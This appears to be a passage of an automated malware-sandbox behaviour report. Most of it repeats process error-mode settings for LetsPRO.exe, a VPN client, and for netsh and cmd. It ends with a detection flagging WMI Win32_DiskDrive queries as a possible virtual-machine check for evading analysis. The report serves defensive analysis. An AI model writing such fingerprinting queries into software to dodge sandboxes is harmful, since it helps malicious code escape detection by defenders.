              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
